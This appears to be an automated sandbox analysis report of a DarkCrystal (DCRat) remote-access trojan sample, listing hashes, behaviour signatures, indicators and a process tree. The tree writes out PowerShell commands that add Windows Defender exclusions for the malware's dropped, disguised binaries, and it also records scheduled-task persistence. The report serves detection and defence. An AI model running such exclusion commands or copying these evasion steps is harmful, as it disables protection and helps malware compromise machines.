dcrat | b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406

Analysis

max time kernel
149s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2024, 10:25 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe
Size

1.3MB
MD5

955ff33aa9dcacab7e1bb7302beada6a
SHA1

ca3ade10c6ec4194d80a72894deb174158880c24
SHA256

b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406
SHA512

2400d960673da8f6fe349a5bd7e0e35c7c4c393351190dc8f01c2d4258489b42adcf89cd6c7b4c4640a943d09cccd85cb49977713eb2fa103c4978f9a009f72a
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1652	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4412	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	884	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5100	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2912	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1304	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4844	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3296	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3484	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3228	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4316	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4724	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2756	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2652	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1784	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4928	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1008	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1016	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1864	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3232	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1648	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4880	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3664	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3744	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1588	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1872	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4796	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4516	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4568	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4764	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2820	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4376	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	768	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4504	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3080	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	444	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2744	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3508	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4900	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3260	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4716	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4848	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4564	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5072	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3008	976	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2556	976	schtasks.exe	88

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023c6d-10.dat	dcrat
behavioral2/memory/4920-13-0x0000000000BB0000-0x0000000000CC0000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4400	powershell.exe
4360	powershell.exe
2928	powershell.exe
4256	powershell.exe
1552	powershell.exe
3932	powershell.exe
1964	powershell.exe
412	powershell.exe
4228	powershell.exe
4356	powershell.exe
2644	powershell.exe
1992	powershell.exe
3320	powershell.exe
2344	powershell.exe
4460	powershell.exe
2624	powershell.exe
2640	powershell.exe
4532	powershell.exe
5016	powershell.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe

Executes dropped EXE 14 IoCs

pid	Process
4920	DllCommonsvc.exe
4892	RuntimeBroker.exe
3940	RuntimeBroker.exe
1672	RuntimeBroker.exe
3400	RuntimeBroker.exe
4300	RuntimeBroker.exe
1900	RuntimeBroker.exe
5136	RuntimeBroker.exe
2248	RuntimeBroker.exe
1112	RuntimeBroker.exe
3940	RuntimeBroker.exe
6116	RuntimeBroker.exe
6136	RuntimeBroker.exe
4804	RuntimeBroker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
54	raw.githubusercontent.com
55	raw.githubusercontent.com
56	raw.githubusercontent.com
18	raw.githubusercontent.com
19	raw.githubusercontent.com
41	raw.githubusercontent.com
45	raw.githubusercontent.com
46	raw.githubusercontent.com
48	raw.githubusercontent.com
40	raw.githubusercontent.com
53	raw.githubusercontent.com
26	raw.githubusercontent.com
47	raw.githubusercontent.com
57	raw.githubusercontent.com

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows NT\TableTextService\9e8d7a4ca61bd9	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\cmd.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\uk-UA\Registry.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\5940a34987c991	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft\9e8d7a4ca61bd9	DllCommonsvc.exe
File created	C:\Program Files (x86)\Common Files\Java\Java Update\upfc.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows NT\TableTextService\RuntimeBroker.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\uk-UA\ee2ad38f3d4382	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft\RuntimeBroker.exe	DllCommonsvc.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\9e8d7a4ca61bd9	DllCommonsvc.exe
File created	C:\Program Files\Uninstall Information\ebf1f9fa8afd6d	DllCommonsvc.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Common Files\Java\Java Update\ea1d8f6d871115	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\winlogon.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\cc11b995f2a76d	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies registry class 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	RuntimeBroker.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4880	schtasks.exe
4764	schtasks.exe
4376	schtasks.exe
444	schtasks.exe
4900	schtasks.exe
2752	schtasks.exe
5072	schtasks.exe
4808	schtasks.exe
4316	schtasks.exe
2652	schtasks.exe
3080	schtasks.exe
4848	schtasks.exe
2912	schtasks.exe
3296	schtasks.exe
1588	schtasks.exe
4516	schtasks.exe
1304	schtasks.exe
1088	schtasks.exe
4716	schtasks.exe
3008	schtasks.exe
884	schtasks.exe
4504	schtasks.exe
4568	schtasks.exe
2756	schtasks.exe
1784	schtasks.exe
1652	schtasks.exe
4724	schtasks.exe
5100	schtasks.exe
4844	schtasks.exe
3188	schtasks.exe
3508	schtasks.exe
3664	schtasks.exe
3228	schtasks.exe
3484	schtasks.exe
1864	schtasks.exe
4796	schtasks.exe
768	schtasks.exe
2936	schtasks.exe
2744	schtasks.exe
4412	schtasks.exe
232	schtasks.exe
1872	schtasks.exe
1016	schtasks.exe
1648	schtasks.exe
2764	schtasks.exe
2720	schtasks.exe
4928	schtasks.exe
3260	schtasks.exe
4564	schtasks.exe
1008	schtasks.exe
3232	schtasks.exe
3744	schtasks.exe
2820	schtasks.exe
2556	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
4920	DllCommonsvc.exe
3320	powershell.exe
3320	powershell.exe
3932	powershell.exe
3932	powershell.exe
4228	powershell.exe
4228	powershell.exe
4256	powershell.exe
4256	powershell.exe
2344	powershell.exe
2344	powershell.exe
4460	powershell.exe
4460	powershell.exe
2624	powershell.exe
2624	powershell.exe
4400	powershell.exe
4400	powershell.exe
4360	powershell.exe
4360	powershell.exe
5016	powershell.exe
4532	powershell.exe
5016	powershell.exe
4532	powershell.exe
2644	powershell.exe
2644	powershell.exe
1964	powershell.exe
1964	powershell.exe
412	powershell.exe
412	powershell.exe
2928	powershell.exe
2928	powershell.exe
4356	powershell.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	4920	DllCommonsvc.exe
Token: SeDebugPrivilege	3320	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	4256	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	1552	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	4892	RuntimeBroker.exe
Token: SeDebugPrivilege	3940	RuntimeBroker.exe
Token: SeDebugPrivilege	1672	RuntimeBroker.exe
Token: SeDebugPrivilege	3400	RuntimeBroker.exe
Token: SeDebugPrivilege	4300	RuntimeBroker.exe
Token: SeDebugPrivilege	1900	RuntimeBroker.exe
Token: SeDebugPrivilege	5136	RuntimeBroker.exe
Token: SeDebugPrivilege	2248	RuntimeBroker.exe
Token: SeDebugPrivilege	1112	RuntimeBroker.exe
Token: SeDebugPrivilege	3940	RuntimeBroker.exe
Token: SeDebugPrivilege	6116	RuntimeBroker.exe
Token: SeDebugPrivilege	6136	RuntimeBroker.exe
Token: SeDebugPrivilege	4804	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4100 wrote to memory of 1916	4100	JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe	83
PID 4100 wrote to memory of 1916	4100	JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe	83
PID 4100 wrote to memory of 1916	4100	JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe	83
PID 1916 wrote to memory of 1912	1916	WScript.exe	85
PID 1916 wrote to memory of 1912	1916	WScript.exe	85
PID 1916 wrote to memory of 1912	1916	WScript.exe	85
PID 1912 wrote to memory of 4920	1912	cmd.exe	87
PID 1912 wrote to memory of 4920	1912	cmd.exe	87
PID 4920 wrote to memory of 1992	4920	DllCommonsvc.exe	144
PID 4920 wrote to memory of 1992	4920	DllCommonsvc.exe	144
PID 4920 wrote to memory of 4256	4920	DllCommonsvc.exe	145
PID 4920 wrote to memory of 4256	4920	DllCommonsvc.exe	145
PID 4920 wrote to memory of 3932	4920	DllCommonsvc.exe	146
PID 4920 wrote to memory of 3932	4920	DllCommonsvc.exe	146
PID 4920 wrote to memory of 1552	4920	DllCommonsvc.exe	147
PID 4920 wrote to memory of 1552	4920	DllCommonsvc.exe	147
PID 4920 wrote to memory of 2624	4920	DllCommonsvc.exe	149
PID 4920 wrote to memory of 2624	4920	DllCommonsvc.exe	149
PID 4920 wrote to memory of 4460	4920	DllCommonsvc.exe	150
PID 4920 wrote to memory of 4460	4920	DllCommonsvc.exe	150
PID 4920 wrote to memory of 2344	4920	DllCommonsvc.exe	151
PID 4920 wrote to memory of 2344	4920	DllCommonsvc.exe	151
PID 4920 wrote to memory of 4228	4920	DllCommonsvc.exe	152
PID 4920 wrote to memory of 4228	4920	DllCommonsvc.exe	152
PID 4920 wrote to memory of 412	4920	DllCommonsvc.exe	153
PID 4920 wrote to memory of 412	4920	DllCommonsvc.exe	153
PID 4920 wrote to memory of 3320	4920	DllCommonsvc.exe	154
PID 4920 wrote to memory of 3320	4920	DllCommonsvc.exe	154
PID 4920 wrote to memory of 5016	4920	DllCommonsvc.exe	155
PID 4920 wrote to memory of 5016	4920	DllCommonsvc.exe	155
PID 4920 wrote to memory of 4532	4920	DllCommonsvc.exe	156
PID 4920 wrote to memory of 4532	4920	DllCommonsvc.exe	156
PID 4920 wrote to memory of 2640	4920	DllCommonsvc.exe	158
PID 4920 wrote to memory of 2640	4920	DllCommonsvc.exe	158
PID 4920 wrote to memory of 1964	4920	DllCommonsvc.exe	164
PID 4920 wrote to memory of 1964	4920	DllCommonsvc.exe	164
PID 4920 wrote to memory of 2928	4920	DllCommonsvc.exe	165
PID 4920 wrote to memory of 2928	4920	DllCommonsvc.exe	165
PID 4920 wrote to memory of 4356	4920	DllCommonsvc.exe	166
PID 4920 wrote to memory of 4356	4920	DllCommonsvc.exe	166
PID 4920 wrote to memory of 4360	4920	DllCommonsvc.exe	167
PID 4920 wrote to memory of 4360	4920	DllCommonsvc.exe	167
PID 4920 wrote to memory of 4400	4920	DllCommonsvc.exe	168
PID 4920 wrote to memory of 4400	4920	DllCommonsvc.exe	168
PID 4920 wrote to memory of 2644	4920	DllCommonsvc.exe	169
PID 4920 wrote to memory of 2644	4920	DllCommonsvc.exe	169
PID 4920 wrote to memory of 932	4920	DllCommonsvc.exe	182
PID 4920 wrote to memory of 932	4920	DllCommonsvc.exe	182
PID 932 wrote to memory of 5564	932	cmd.exe	184
PID 932 wrote to memory of 5564	932	cmd.exe	184
PID 932 wrote to memory of 4892	932	cmd.exe	188
PID 932 wrote to memory of 4892	932	cmd.exe	188
PID 4892 wrote to memory of 5540	4892	RuntimeBroker.exe	195
PID 4892 wrote to memory of 5540	4892	RuntimeBroker.exe	195
PID 5540 wrote to memory of 4664	5540	cmd.exe	197
PID 5540 wrote to memory of 4664	5540	cmd.exe	197
PID 5540 wrote to memory of 3940	5540	cmd.exe	203
PID 5540 wrote to memory of 3940	5540	cmd.exe	203
PID 3940 wrote to memory of 60	3940	RuntimeBroker.exe	205
PID 3940 wrote to memory of 60	3940	RuntimeBroker.exe	205
PID 60 wrote to memory of 2184	60	cmd.exe	208
PID 60 wrote to memory of 2184	60	cmd.exe	208
PID 60 wrote to memory of 1672	60	cmd.exe	212
PID 60 wrote to memory of 1672	60	cmd.exe	212

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_b0efaa76ce4f31e0ef0309a8cb7bc02b9bc025e26a95649abc9ab6e7cc7a7406.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4100
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1992
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\lsass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Saved Games\OfficeClickToRun.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2624
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\winlogon.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\csrss.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\upfc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3320
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5016
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
